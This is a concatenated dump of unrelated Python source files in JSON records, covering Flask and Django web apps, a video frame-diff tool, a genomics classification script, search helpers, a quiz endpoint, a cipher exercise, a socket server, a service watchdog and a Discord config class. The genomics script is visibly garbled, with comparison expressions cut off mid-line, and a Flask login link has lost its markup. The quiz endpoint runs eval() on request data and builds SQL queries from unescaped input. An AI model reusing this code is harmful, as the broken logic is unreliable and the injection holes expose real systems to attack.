check_password_hash(user.password, self.password.data):\n # to compare plain text passwords use\n # if user.password != self.password.data:\n raise validators.ValidationError('Invalid password')\n\n def get_user(self):\n return db.session.query(User).filter_by(login=self.login.data).first()\n\nclass RegistrationForm(form.Form):\n login = fields.TextField(validators=[validators.required()])\n email = fields.TextField()\n password = fields.PasswordField(validators=[validators.required()])\n\n def validate_login(self, field):\n if db.session.query(User).filter_by(login=self.login.data).count() > 0:\n raise validators.ValidationError('Duplicate username')\n\n@login_manager.user_loader\ndef load_user(user_id):\n return db.session.query(User).get(user_id)\n\n#########################################\nfrom flask import redirect, url_for, request\nfrom flask_admin import BaseView, expose, helpers\nfrom flask.ext.admin.contrib.sqla import ModelView\nfrom nektime.models import User, Answer, Question\n\nclass MyIndexView(BaseView):\n @expose('/')\n def index(self):\n if not login.current_user.is_authenticated():\n return redirect(url_for('.login_view'))\n return super(MyAdminIndexView, self).index()\n @expose('/login/', methods=('GET','POST'))\n def login_view(self):\n form = LoginForm(request.form)\n if helpers.validate_form_on_submit(form):\n user = form.get_user()\n login.login_user(user)\n if login.current_user.is_authenticated():\n return redirect(url_for('.index'))\n link = '

    Don\\'t have an account? Click here to register.

    '\n self._template_args['form'] = form\n self._template_args['link'] = link\n return super(MyIndexView, self).index()\n @expose('/logout/')\n def logout_view(self):\n login.logout_user()\n return redirect(url_for('.index'))\n\nclass MyModelView(ModelView):\n def is_acessible(self):\n return login.current_user.is_authenticated()\n\nadmin.add_view(MyIndexView(name='Hello 1', endpoint='test1', category='Test'))\nadmin.add_view(MyIndexView(name='Hello 2', endpoint='test2', category='Test'))\nadmin.add_view(MyIndexView(name='Hello 3', endpoint='test3', category='Test'))\n\nadmin.add_view(MyModelView(User, db.session))\nadmin.add_view(MyModelView(Question, db.session))\nadmin.add_view(MyModelView(Answer, db.session))","sub_path":"nektime/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"568927307","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom . import views\n\napp_name = 'polls'\nurlpatterns = [\n url(r'^add/$', views.add, name=\"add\"),\n url(r'^add2/(\\d+)/(\\d+)/$', views.add2, name=\"add2\"),\n url(r'^(\\d+)/$', views.detail, name=\"detail\"),\n url(r'^(\\d+)/vote/$', views.vote, name='vote'),\n url(r'^(\\d+)/results/$', views.results, name='results'),\n url(r'^$', views.index, name=\"index\"),\n]\n","sub_path":"mysite/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"218747027","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom capture import *\nimport numpy\n\n# Note: we consider frame differences to be the number of pixels with an rgb\n# component > 5 components (out of 255) different from the previous frame.\n# this probably doesn't catch all cases, but works well in the common case\n# of eliminating frame differences due to \"noise\" in the HDMI capture\nPIXEL_DIFF_THRESHOLD = 5.0\n\ndef get_framediff_image(capture, framenum1, framenum2, cropped=False):\n frame1 = capture.get_frame(framenum1, cropped)\n frame2 = capture.get_frame(framenum2, cropped)\n framediff = numpy.abs(frame1.astype('float') - frame2.astype('float'))\n thresh = 5.0\n for row in framediff:\n for px in row:\n if px[0] >= PIXEL_DIFF_THRESHOLD or px[1] >= PIXEL_DIFF_THRESHOLD \\\n or px[2] >= PIXEL_DIFF_THRESHOLD:\n px[0] = 255.0\n px[1] = 0.0\n px[2] = 0.0\n\n return Image.fromarray(framediff.astype(numpy.uint8))\n\ndef get_framediff_sums(capture):\n try:\n cache = pickle.load(open(capture.cache_filename, 'r'))\n except:\n cache = {}\n\n try:\n diffsums = cache['diffsums']\n except:\n # Frame differences\n diffsums = None\n prevframe = None\n diffsums = []\n for i in range(1, capture.num_frames+1):\n frame = capture.get_frame(i, True).astype('float')\n if prevframe != None:\n framediff = (frame - prevframe)\n framediff = framediff[framediff >= PIXEL_DIFF_THRESHOLD]\n diffsums.append(len(framediff))\n prevframe = frame\n cache['diffsums'] = diffsums\n pickle.dump(cache, open(capture.cache_filename, 'w'))\n\n return diffsums\n\ndef get_num_unique_frames(capture):\n framediff_sums = get_framediff_sums(capture)\n return 1 + len([framediff for framediff in framediff_sums if framediff > 0])\n\ndef get_fps(capture):\n return get_num_unique_frames(capture) / capture.length\n\ndef get_stable_frame(capture, threshold = 2048):\n framediff_sums = get_framediff_sums(capture)\n for i in range(len(framediff_sums)-1, 0, -1):\n if framediff_sums[i] > threshold:\n return i+1\n return len(framediff_sums)-1\n","sub_path":"src/videocapture/videocapture/framediff.py","file_name":"framediff.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"237887145","text":"#!/usr/bin/env python\nimport sys,re\n\nIN=open(sys.argv[1],'r')\n\nOUT=open(sys.argv[2],'w')\n\nOUT1=open(\"Pg.Classfication.xls\",'w')\n\n#type distance lncRChr lncRstart lncRend Chr start end\n#genedist 193 Chr1 780106 780409 Chr1 780602 781285\n#genedist 815 Chr1 2816 2497 At1NC000020 Chr1 3631 5899 AT1G01010\n\np=0\nb=0\nc=0\nf=0 #(head to head)\ne=0\nd=0\nfr=IN.readline()\n\ndistant=0\n\nOUT1.write(\"\\t\".join([\"Classification\",\"Type\",\"distance\",\"lncRChr\",\"lncRstart\",\"lncRend\",\"lnRNA\",\"Chromosome\",\"Start\",\"End\",\"Gene/Pseudogene\"])+\"\\n\")\nfor eachline in IN:\n\tsplit=eachline.rstrip().split(\"\\t\")\n\tla=int(split[3])\t\n\tlb=int(split[4])\n\tga=int(split[7])\n\tgb=int(split[8])\n\tif int(split[1])<2000 and split[0]==\"pgdist\":\n\t\tif (lbga):\n\t\t\tif ga>lb:\n\t\t\t\tp+=1\n\t\t\t\tOUT1.write(\"%s\\t%s\\n\"%(\"Promoter associated\",eachline.rstrip()))\n\t\t\t\t#print eachline\n\t\t\telif lb>gb:\n\t\t\t\tf+=1\n\t\t\t\tOUT1.write(\"%s\\t%s\\n\"%(\"Tail to Tail\",eachline.rstrip()))\n\t\t\t\t#print eachline\n\t\t\telif lbgb):\n\t\t\tif gagb:\n\t\t\t\tb+=1\n\t\t\t\tOUT1.write(\"%s\\t%s\\n\"%(\"Body associated\",eachline.rstrip()))\n\t\t\t\t#print eachline\n\t\t\telif gb>lb:\n\t\t\t\tf+=1\n\t\t\t\tOUT1.write(\"%s\\t%s\\n\"%(\"Tail to Tail\",eachline.rstrip()))\n\t\t\t\t#print eachline\n\t\telif (la=2000 and split[0]==\"pgdist\":\n\t\tdistant+=1\nOUT.write(\"%s\\t%s\\n%s\\t%s\\n%s\\t%s\\n%s\\t%s\\n%s\\t%s\\n\"%(\"promoter\",p,\"body\",b,\"Co\",c,\"f\",f,\"distant\",distant))\n\nIN.close()\nOUT.close()\t\n","sub_path":"script/Sumpgv1.py","file_name":"Sumpgv1.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"266953353","text":"import board_manipulation as b_m\nfrom search_node import search_node\n\n# manhattan distance is distance between two points on a grid based on strictly horizontal and/or vertical path\ndef manhattan_distance(start, end):\n\n sx, sy = start\n ex, ey = end\n\n return abs(ex - sx) + abs(ey - sy)\n\n# generates and returns all children nodes of the node if it does not collide with a wall\ndef generate_all_successors(board, node):\n\n new_nodes = {}\n cell_categories = [\"w\", \"m\", \"f\", \"g\", \"r\", \".\", \"B\"]\n\n temp_location = list(node.location)\n\n if temp_location[1] < (len(board)-1): # checks if this is edge of map\n\n temp_location[1] += 1 # y value +1 (goes up)\n\n m_v = b_m.get_map_value(board, temp_location)\n\n if m_v in cell_categories: #checks if map value is not a wall\n\n #creates a node\n temp_location = (temp_location[0], temp_location[1])\n new_node = search_node(G= node.g , Parent=node)\n new_node.g += b_m.calculate_g(board, new_node)\n new_node.location = temp_location\n x = new_node.parent\n\n #creates the nodes \"state\", what path it takes from start node\n while x != None:\n\n new_node.state.append(x.location)\n x = x.parent\n\n new_nodes[temp_location] = new_node\n\n #repeats previous actions on left, right, down movement\n\n temp_location = list(node.location)\n\n if temp_location[0] < (len(board[0])-1):\n\n temp_location[0] += 1\n\n m_v = b_m.get_map_value(board, temp_location)\n\n if m_v in cell_categories:\n\n temp_location = (temp_location[0],temp_location[1])\n new_node = search_node(G= node.g, Parent=node)\n new_node.g += b_m.calculate_g(board, new_node)\n new_node.location = temp_location\n x = new_node.parent\n\n while x != None:\n\n new_node.state.append(x.location)\n x = x.parent\n\n new_nodes[temp_location] = new_node\n\n temp_location = list(node.location)\n\n if temp_location[1]> 0:\n\n temp_location[1] -= 1\n\n m_v = b_m.get_map_value(board, temp_location)\n\n if m_v in cell_categories:\n\n temp_location = (temp_location[0], temp_location[1])\n new_node = search_node(G= node.g, Parent=node)\n new_node.g += b_m.calculate_g(board, new_node)\n new_node.location = temp_location\n x = new_node.parent\n\n while x != None:\n\n new_node.state.append(x.location)\n x = x.parent\n\n new_nodes[temp_location] = new_node\n\n temp_location = list(node.location)\n\n if temp_location[0] > 0:\n\n temp_location[0] -= 1\n\n m_v = b_m.get_map_value(board, temp_location)\n\n if m_v in cell_categories:\n\n temp_location = (temp_location[0], temp_location[1])\n new_node = search_node(G= node.g, Parent=node)\n new_node.g += b_m.calculate_g(board, new_node)\n new_node.location = temp_location\n x = new_node.parent\n\n while x != None:\n\n new_node.state.append(x.location)\n x = x.parent\n\n new_nodes[temp_location] = new_node\n\n return new_nodes\n\n# attaches child to a node that is now considered its best parent so far\ndef attach_and_eval(map_array, child, parent, goal_location):\n\n child.parent = parent\n child.g = parent.g + b_m.calculate_g(map_array, child)\n child.h = manhattan_distance(child.location, goal_location)\n child.f = int(child.g) # doesnt matter what f is in bfs\n\n# recurses through the children of a parent and other descendants if the new parent.g value makes the path better\ndef propagate_path_improvements(map_array, parent):\n\n for kid in parent.children:\n\n if ((parent.g) + b_m.calculate_g(map_array, kid)) < kid.g:\n\n kid.parent = parent\n kid.g = parent.g + b_m.calculate_g(map_array, kid)\n kid.f = kid.g # doesnt matter what f is in bfs","sub_path":"bfs/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"260646019","text":"# Create your views here.\n\nfrom blog.models import Blog, Category\nfrom django.shortcuts import render_to_response, get_object_or_404\n\ndef index(request):\n \"\"\"render index.html\n \n Arguments:\n - `request`:\n \"\"\"\n context = {'categories': Category.objects.all(),\n 'posts':Blog.objects.all()[:5]}\n return render_to_response('index.html',\n context,)\n\n\ndef view_post(request, slug):\n \"\"\"render posts\n \n Arguments:\n - `request`:\n - `slug`:\n \"\"\"\n context = {'post':get_object_or_404(Blog, slug=slug)}\n render_to_response('view_post.html',\n context)\n\ndef view_category(request, slug):\n \"\"\"view categories\n \n Arguments:\n - `request`:\n - `slug`:\n \"\"\"\n category = get_object_or_404(Category, slug=slug)\n context = {'category':category,\n 'posts':Blog.objects.filter(category=category)[:5]}\n \n render_to_response('view_category.html', \n context)\n\n \n\n\n\n \n","sub_path":"djangorocks/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"459576174","text":"from flask import Flask, request, Response\nfrom pymysql import cursors\nimport json\n\ndef javaHashMapStrToJson(data):\n data = data.replace(',', '}, {')\n data = data.replace('=',',')\n data = data.replace(\"'\",'\"')\n data = '['+data+']'\n data = eval(data)\n data = sorted(data,key = lambda i:i['id'])\n return data\n\ndef mod(n):\n if n < 0:\n return -n\n return n\n\ndef answers(connection):\n with connection.cursor() as cursor:\n fbid = request.form.get(\"firebase_id\")\n cursor.execute(\"SELECT firebase_id FROM profile WHERE firebase_id = '{}'\".format(fbid))\n if cursor.rowcount == 0:\n return Response(json.dumps({\"status\": \"failure\", \"Reason\":\"Firebase ID doesnot exist\", \"status_code\": \"200\"}), mimetype=\"application/json\", status=200)\n data = request.form.get(\"answers\")\n try:\n data = javaHashMapStrToJson(data)\n except:\n return Response(json.dumps({\"status\":\"failure\", \"Reason\":\"Cant parse answers\", \"status_code\":\"200\"}),mimetype=\"application/json\",status = 200)\n score = 0\n id = 0\n query = \"select * from quiz where id = \".format(data[id][\"id\"])\n for i in range(len(data)):\n query += \" {} or id = \".format(data[id][\"id\"])\n id+=1\n id = 0\n query = query[:-9]\n cursor.execute(query)\n if cursor.rowcount==0:\n return Response(json.dumps({\"status\": \"failure\", \"status_code\": \"200\"}), mimetype=\"application/json\", status=200)\n ans = cursor.fetchall()\n for i in range(len(data)):\n qid = ans[id][\"id\"]\n if(int(ans[id][\"ans\"])==int(data[id][\"ans\"])):\n score+=1\n id+=1\n cursor.execute(\"SELECT quiz_rating FROM profile WHERE firebase_id = '{}'\".format(fbid))\n rating = cursor.fetchone()\n rating = rating[\"quiz_rating\"]\n newRating = rating+score\n cursor.execute(\"UPDATE profile SET quiz_rating = '{}', points = points + {} WHERE firebase_id = '{}'\".format(newRating,score,fbid))\n # connection.commit()\n return Response(json.dumps({\"status\": \"success\", \"status_code\": \"200\", \"score\": score}),mimetype = \"application/json\",status = 200)\n","sub_path":"quiz_answers.py","file_name":"quiz_answers.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"34488279","text":"from random import *\n\n\n# ETAPE 1\ndef crypter_char(char, decalage):\n actuel = ord(char)\n actuel += decalage\n return chr(actuel)\n\n\n# ETAPE 2\ndef decrypter_char(char, decalage):\n actuel = ord(char)\n actuel -= decalage\n return chr(actuel)\n\n\n# ETAPE 3\ndef crypter_phrase(phrase, decalage):\n nouvelle_phrase = \"\"\n for lettre in phrase:\n nouvelle_phrase += crypter_char(lettre, decalage)\n return nouvelle_phrase\n\n\n# ETAPE 4\ndef decrypter_phrase(phrase, decalage):\n nouvelle_phrase = \"\"\n for lettre in phrase:\n nouvelle_phrase += decrypter_char(lettre, decalage)\n return nouvelle_phrase\n\n\n# ETAPE 5\ndef cryptage(element):\n decalage = randrange(1, 10)\n phrase = crypter_phrase(element, decalage)\n return chr(decalage) + phrase\n\n\n# ETAPE 6\ndef decryptage(element):\n decalage = ord(element[0])\n phrase = element[1:]\n return decrypter_phrase(phrase, decalage)\n\n\n# ETAPE 7\ndef main():\n reponse = str(input('Voulez-vous crypter ou decrypter: '))\n while (reponse.lower() != 'crypter' and reponse.lower() != 'decrypter'):\n reponse = str(input('Voulez-vous crypter ou decrypter: '))\n\n if (reponse.lower() == 'crypter'):\n element = str(input('Element à crypter: '))\n print('Element crypter: ', cryptage(element))\n else:\n element = str(input('Element à decrypter: '))\n print('Element décrypter: ', decryptage(element))\n\n\n# ETAPE 8\nreponse = \"rien\" # pour rentrer dans le while\nwhile (reponse.lower() != 'non'):\n main()\n reponse = str(input('\\nVoulez-vous recommencer? ')) \n","sub_path":"exo9.6.py","file_name":"exo9.6.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"414210145","text":"import os, time, json, logging\n\nfrom initial_ML_module import Trainer\n\ntrain_folder = os.environ.get(\"TRAIN_DATA_FOLDER\",\"./train\")\nlog_folder = os.environ.get(\"LOGS_FOLDER\",\"./logs\")\n\nlogFile = log_folder + '/ml.log'\nlogger = logging.getLogger(__name__)\n\n# Create handlers\nf_handler = logging.FileHandler(logFile)\nf_handler.setLevel(logging.DEBUG)\n\n# Create formatters and add it to handler\nf_format = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nf_handler.setFormatter(f_format)\n\n# Add handlers to the logger\nlogger.addHandler(f_handler)\ndef start():\n logger.info(\"Training process started ...\")\n _json = None \n try:\n _file = open(train_folder + \"/train.data\",'r')\n _json = json.loads(_file.read())\n _file.close()\n except Exception as e:\n logger.info(\"An error occured\")\n logger.info(e)\n return False \n try:\n trainer = Trainer(_json[\"url_file\"],_json[\"target\"],_json[\"application\"],_json[\"features\"], _json['variant'])\n trainer.train()\n except Exception as e:\n print(e)\n logger.info(e)\n\nif __name__ == \"__main__\":\n start()","sub_path":"forecasting/morphemic/morphemic-performance-model/ml_code/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"388483145","text":"import math\nN = int(input())\n\ninput_list = [list(map(int, input().split())) for i in range(N)]\n \ndistance_list = []\nfor x1, y1 in input_list:\n for x2, y2 in input_list:\n dist = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n distance_list.append(dist)\nprint(round(max(distance_list), 6))","sub_path":"arc004/a/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"84697487","text":"from datetime import date\n\nfrom bidict import bidict\n\nfrom constants import DB\nfrom models import Vehicle, Company, DeliveryNote, DeliveryNoteItem\nfrom models import Settings\n\nITEM_TYPES = bidict(\n {\"HOURS\": \"Hours\",\n \"KMS\": \"Kms\",\n \"OTHERS\": \"Others\"}\n )\nEXPIRATION_DAYS = (30, 60, 90, 120, 180)\nPAYMENT_TYPES = bidict(\n {\"CONFIRMING\": \"Confirming\",\n \"BANK_TRANSFER\": \"Bank transfer\",\n \"PROMISSORY_NOTE\": \"Promissory note\",\n \"CASH\": \"Cash\", \"PAID\": \"Paid\",\n \"CHECK\": \"Check\"}\n )\n \n\ndef init_db():\n DB.connect()\n DB.drop_tables(\n [Company, DeliveryNoteItem, DeliveryNote, Vehicle, Settings],\n safe=True)\n DB.create_tables(\n [Company, DeliveryNoteItem, DeliveryNote, Vehicle, Settings],\n safe=True)\n\n\ndef drop_tables():\n DB.connect()\n DB.drop_tables(\n [Company, DeliveryNoteItem, DeliveryNote, Vehicle, Settings],\n safe=True)\n\n\ndef populate_db():\n v12 = Vehicle(\n number=12, plate=\"1234ABC\", brand=\"My brand\",\n model=\"My model\", hour_price=27.32, km_price=8.99\n )\n v15 = Vehicle(\n number=15, plate=\"9876ZYX\", brand=\"My brand\",\n model=\"My model\", hour_price=34.02, km_price=4.00\n )\n v12.save()\n v15.save()\n\n c1 = Company(\n code=\"0001\", name=\"Company name\", nif=\"B12345678\",\n address=\"Rue st.\", city=\"Zaragoza\", state=\"Zaragoza\",\n zip_code=\"50000\", phone=\"123456789\", contact_person=\"Foolano\",\n alternative_phone=\"987654321\", fax=\"246813579\",\n email=\"foolano@bar.com\", iban=\"ES12345678901234567890123456789012\",\n bank_name=\"THE Bank\", payment_type=\"CASH\", expiration_days=30,\n first_payment_day=5, second_payment_day=15, third_payment_day=25\n )\n\n c2 = Company(\n code=\"0002\", name=\"Foo Inc.\", nif=\"B45678123\",\n address=\"Major st\", city=\"Zaragoza\", state=\"Zaragoza\",\n zip_code=\"50002\", email=\"foolano@bar.com\",\n iban=\"ES12345678901234567890123456789012\", bank_name=\"Minor Bank\",\n payment_type=\"BANK_TRANSFER\", expiration_days=45,\n first_payment_day=8\n )\n\n c1.save()\n c2.save()\n\n dn1 = DeliveryNote(\n code=\"11111111\", date=date(2016, 1, 3), company=c1, vehicle=v12,\n invoiced=False\n )\n dn2 = DeliveryNote(\n code=\"22222222\", date=date(2016, 1, 5), company=c1, vehicle=v15,\n invoiced=False\n )\n dn1.save()\n dn2.save()\n\n dni1 = DeliveryNoteItem(\n delivery_note=dn1, item_type=\"HOURS\", units=12,\n price=v12.hour_price, description=\"Working hard\"\n )\n dni2 = DeliveryNoteItem(\n delivery_note=dn2, item_type=\"HOURS\", units=7,\n price=21.00, description=\"We are working hard here\"\n )\n dni3 = DeliveryNoteItem(\n delivery_note=dn2, item_type=\"OTHERS\", units=1,\n price=327.86, description=\"Are you working hard?\"\n )\n dni1.save()\n dni2.save()\n dni3.save()\n\n Settings(vat=21.00, invoice_number=\"0000000001\").save()\n","sub_path":"sigg/util/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"313206570","text":"import socket#Get Required Modules\nimport sys\nfrom _thread import *\naddress=[]\nconnections=[]\n\ndef ReturnData(Type):\n if Type==\"Connections\":\n global address\n return address\n\ndef Message(Message,ConnN):\n #Message(Message , Connection Number)\n #Send Client(s) a message\n global connections#Get Connections List from Global Source\n if ConnN==\"*\":\n for connection in connections:#For Every Connection\n connection.sendall(Message)#Send Message To Current Connection\n else:\n connections[ConnN].sendall(Message)#Send Message To Selected Connection\n\ndef GetReply(Query,ConnN,Terminator):\n #GetReply(Question , Connection Num , End Character , Reply Message)\n #Ask Client(s) a question\n global connections#Get Connections List from Global Source\n if ConnN==\"*\":#If Target Connection is \"*\"\n for ConTrgt in connections:#Run GetReplyExec for each Connection\n Word=[]\n Word.append(GetReplyExec(Query,ConTrgt,Terminator))\n else:#Run GetReplyExec for Selected Connection\n print(connections)\n Word=GetReplyExec(Query,connections[ConnN],Terminator)\n print(Word)\n return Word\n exit()\n\ndef GetReplyExec(Query,ConTrgt,Terminator):\n #GetReply(Question , Connection Num , End Character , Reply Message)\n #Ask Client(s) a question\n ConTrgt.sendall(str.encode(Query))#Send Client Message\n Word=GetUsrInput(ConTrgt,Terminator)\n return Word\n\ndef GetUsrInput(ConTrgt,Terminator):\n Word=\"\"\n while True:\n c = ConTrgt.recv(2048000).decode(\"utf-8\")#Get Clients Character Input\n Word+=c#Add character to the word/scenetence\n\n if c==\"\b\":#if character is (Back Space)\n\n Word=Word[0:len(Word)-2]#Remove Delete Character And Previous Charcter\n\n if Terminator not in Word:#Check if Terminator Charcter in Word\n\n if not Word:\n break#End Function\n\n if Terminator in Word:#If Terminsator is in Word\n\n #print(Word[0:len(Word)-1])#Display Word\n return Word[0:len(Word)-1]\n break\n #End Function\n\ndef Server():\n #start_new_thread(Server,())\n #Start The Server\n\n import socket#Import Required Modules\n import sys\n\n host = ''#Set Connection Settings\n port = 1234\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:#Try To Bind To Port And IP\n s.bind((host, port))\n except socket.error as e:\n print(str(e))\n\n s.listen(5)\n #print('Waiting for a connection.')\n\n connections=[]#Create connections List\n address=[]\n global connections, address\n\n while True:\n\n connection, addr = s.accept()#Set connection and addr\n connections.append(connection)#Add connection to list of connections\n address.append(addr)\n print('connected to: '+addr[0]+':'+str(addr[1]))#Log the new connection\n\n#start_new_thread(Server,())\n","sub_path":"Server/Version 1/ServerModule.py","file_name":"ServerModule.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"475076779","text":"#\n# [347] Top K Frequent Elements\n#\n# https://leetcode.com/problems/top-k-frequent-elements/description/\n#\n# algorithms\n# Medium (50.13%)\n# Total Accepted: 113.4K\n# Total Submissions: 226.1K\n# Testcase Example: '[1,1,1,2,2,3]\\n2'\n#\n#\n# Given a non-empty array of integers, return the k most frequent elements.\n#\n# For example,\n# Given [1,1,1,2,2,3] and k = 2, return [1,2].\n#\n#\n# Note:\n#\n# You may assume k is always valid, 1 ≤ k ≤ number of unique elements.\n# Your algorithm's time complexity must be better than O(n log n), where n is\n# the array's size.\n#\n\n\nclass Solution:\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n dic = dict()\n for n in nums:\n if n not in dic:\n dic[n] = 1\n else:\n dic[n] += 1\n\n # Bucket Sort using frequency number in dic\n bucket = [set() for x in range(len(nums)+1)]\n for n in nums:\n bucket[dic[n]].add(n)\n res, i = [], 0\n for b in bucket[::-1]:\n for n in b:\n res.append(n)\n i += 1\n if i == k:\n return res\n","sub_path":"347.top-k-frequent-elements.python3.py","file_name":"347.top-k-frequent-elements.python3.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"318200876","text":"#!/usr/bin/env python3\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import Int32MultiArray\nimport rrtstarconnect1\nimport numpy as np\n\ndef print1():\n print(\"hello from ros\")\n\ndef give():\n pub = rospy.Publisher('path_topic', Int32MultiArray, queue_size=10)\n rospy.init_node('path_node', anonymous=True)\n rate = rospy.Rate(10) # 10hz\n path = Int32MultiArray()\n # path.data = rrtstarconnect1.p4\n\n while not rospy.is_shutdown():\n # path = rrtstarconnect1.p4\n # img = rrtstarconnect1.imre\n # rrtstarconnect1.show(img)\n p5 = np.array(rrtstarconnect1.p4)\n print(p5)\n # p5 = (p5/300)*11\n path.data = np.frombuffer(p5.tobytes(),'int32')\n print(path.data)\n pub.publish(path)\n rate.sleep()\n\nif __name__ == '__main__':\n try:\n rrtstarconnect1.rrtstarconnect()\n give()\n except rospy.ROSInterruptException:\n pass","sub_path":"task 3/codes/catkin_ws/src/turtle/src/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"266007195","text":"# Calcule o resultado da expressão A > b and C or D, utilizando os valores da tabela a seguir.\n\na = 1\nb = 2\nc = True\nD = False\n\nprint (a > b and c or D) # falso\n\na2 = 10\nb2 = 3\nc2 = False\nd2 = False\n\nprint (a2 > b2 and c2 or d2)\n\na3 = 5\nb3 = 1\nc3 = True\nd3 = True\n\nprint (a3 > b3 and c3 or d3)\n\n","sub_path":"exercicio 3.5.py","file_name":"exercicio 3.5.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"232332239","text":"#! /usr/bin/env python \n\nimport urllib2\nimport subprocess\nimport stat\nimport os\nimport time\nimport smtplib\nimport shlex\nimport socket\nimport fcntl\nimport sys\n\nSCRIPTS_PATH = '/root/scripts/'\nTOMCAT_URL = 'http://www.intranet.upsa.es:8180/prueba'\nWEB_URL = 'http://www.upsa.es/prueba'\nTOMCAT_PID_FILE = '/var/run/tomcat5.5.pid'\nWEB_PID_FILE = '/var/run/lighttpd.pid'\nLOCK_FILE = '/var/lock/check_services'\n\ndef test_url(url):\n try:\n uf = urllib2.urlopen(url)\n except:\n return False\n data = uf.read().strip()\n if data == 'OK':\n return True\n else:\n return False\n\ndef test_service(pid_file):\n if os.path.exists(pid_file):\n mode = os.stat(pid_file)\n if (mode[stat.ST_CTIME] + 300) > int(time.time()):\n return False\n return True\n\ndef test_web():\n if test_service(WEB_PID_FILE) and not test_url(WEB_URL):\n return False\n return True\n\ndef test_tomcat():\n if test_service(TOMCAT_PID_FILE) and not test_url(TOMCAT_URL):\n return False\n return True\n\n\ndef restart_service(service):\n msg = \"\"\"Subject: reinciando servicios\n\n Reiniando servicios: \n \"\"\" \n msg = msg + service\n server = smtplib.SMTP('edge.upsa.es')\n server.sendmail('webpro01@upsa.es', 'sistemas@upsa.es', msg)\n server.quit()\n cmd = '/etc/init.d/' + service + ' restart'\n args = shlex.split(cmd)\n subprocess.Popen(args)\n\ndef lock():\n f = open(LOCK_FILE, 'w')\n try:\n fcntl.flock(f.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)\n except:\n return False\n return f\n\ndef unlock(f):\n fcntl.flock(f.fileno(), fcntl.LOCK_UN)\n f.close()\n os.remove(LOCK_FILE)\n return True\n\ndef main():\n\n f = lock()\n if not f:\n sys.exit()\n \n timeout = 5\n socket.setdefaulttimeout(timeout)\n \n if not test_tomcat() or not test_tomcat():\n restart_service('tomcat5.5')\n if not test_web() or not test_web():\n restart_service('lighttpd')\n \n unlock(f)\n\nif __name__ == '__main__':\n main()\n","sub_path":"check_services.py","file_name":"check_services.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"36974809","text":"import inspect\n\nfrom abc import ABC, abstractmethod\nfrom collections.abc import Iterable\n\nimport typing\nfrom typing import Dict, Any, NoReturn\n\nimport discord\nfrom discord.ext.commands import Bot, Context, BadArgument\n\nfrom pymongo import ReturnDocument\n\nimport logging\nlog = logging.getLogger('Penelope')\n\nclass CogConfig(ABC):\n \"\"\"Uses python type hints to autofill the guild config for a cog\"\"\"\n _bot: Bot\n\n def __new__(cls):\n self = super().__new__(cls)\n self.type_hints = typing.get_type_hints(cls)\n del self.type_hints['_bot'] # ehh\n return self\n\n\n def __getattr__(self, name):\n if name == 'guild':\n return self._bot.get_guild(self._guild_id)\n\n if name in self.type_hints:\n hint = self.type_hints[name]\n param_id = self.__getattribute__(self._serialize_param(name))\n\n if typing.get_origin(hint) is list:\n hint = typing.get_args(hint)[0]\n return [self._get_param(p_id, hint) for p_id in param_id]\n\n return self._get_param(param_id, hint)\n\n\n def _get_param(self, param_id, hint):\n if hint is discord.TextChannel:\n return self._bot.get_channel(param_id)\n\n elif hint is discord.User:\n return self._bot.get_user(param_id)\n\n elif hint is discord.Role:\n return self.guild.get_role(param_id)\n\n elif hint is discord.Message:\n if not param_id:\n return None\n param = list(map(int, param_id.split(':')))\n return self._bot.get_channel(param[0]).fetch_message(param[1])\n\n else:\n log.warning(f'{self.__class__.__name__} - {hint} not implemented in __getattr__')\n\n\n @property\n def _embed(self) -> discord.Embed:\n 